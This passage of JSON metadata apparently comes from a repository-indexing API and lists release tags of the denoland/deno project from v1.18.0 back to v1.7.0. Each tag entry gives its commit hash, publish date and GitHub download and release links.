GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/a